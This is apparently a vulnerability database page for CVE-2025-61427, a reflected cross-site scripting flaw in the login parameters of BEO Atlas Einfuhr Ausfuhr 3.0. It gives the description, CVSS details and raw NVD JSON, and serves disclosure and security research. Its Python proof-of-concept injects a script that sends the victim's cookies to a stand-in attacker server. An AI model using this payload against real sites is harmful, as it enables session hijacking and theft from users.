Security Vulnerability Report
中文
CVE-2025-61427 CVSS 6.1 MEDIUM

CVE-2025-61427

Published: 2025-10-31 15:15:43
Last Modified: 2026-04-15 00:35:42

Description

A reflected cross-site scripting (XSS) vulnerability in BEO GmbH BEO Atlas Einfuhr Ausfuhr 3.0 allows attackers to execute arbitrary code in the context of a user's browser via injecting a crafted payload into the userid and password parameters.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

BEO Atlas Einfuhr Ausfuhr 3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-61427 PoC - Reflected XSS in BEO Atlas Einfuhr Ausfuhr 3.0 # Target: BEO GmbH BEO Atlas Einfuhr Ausfuhr 3.0 # Vulnerability: Reflected XSS via userid and password parameters TARGET_URL = "http://target-server/beo-atlas/login" # XSS payload - steals victim cookie xss_payload = "<script>fetch('https://attacker-server/steal?c='+document.cookie)</script>" # Construct malicious URL with XSS payload in userid parameter params = { "userid": xss_payload, "password": "test" } print("[*] Sending XSS payload to target...") print(f"[*] Target URL: {TARGET_URL}") print(f"[*] Payload: {xss_payload}") try: # Send request with XSS payload response = requests.get(TARGET_URL, params=params, timeout=10) # Check if payload is reflected in response if xss_payload in response.text: print("[+] VULNERABLE! XSS payload reflected in response") print(f"[+] Payload reflected in response body") else: print("[-] Not vulnerable or payload not reflected") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61427", "sourceIdentifier": "[email protected]", "published": "2025-10-31T15:15:43.263", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A reflected cross-site scripting (XSS) vulnerability in BEO GmbH BEO Atlas Einfuhr Ausfuhr 3.0 allows attackers to execute arbitrary code in the context of a user's browser via injecting a crafted payload into the userid and password parameters."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://ttz-wue.fiw.thws.de/blog/index.php/2025/10/31/ttz-wue-entdeckt-neue-schwachstelle-reflected-cross-site-scripting-xss-in-beo-gmbh-beo-atlas-einfuhr-ausfuhr-3-0/", "source": "[email protected]"}]}}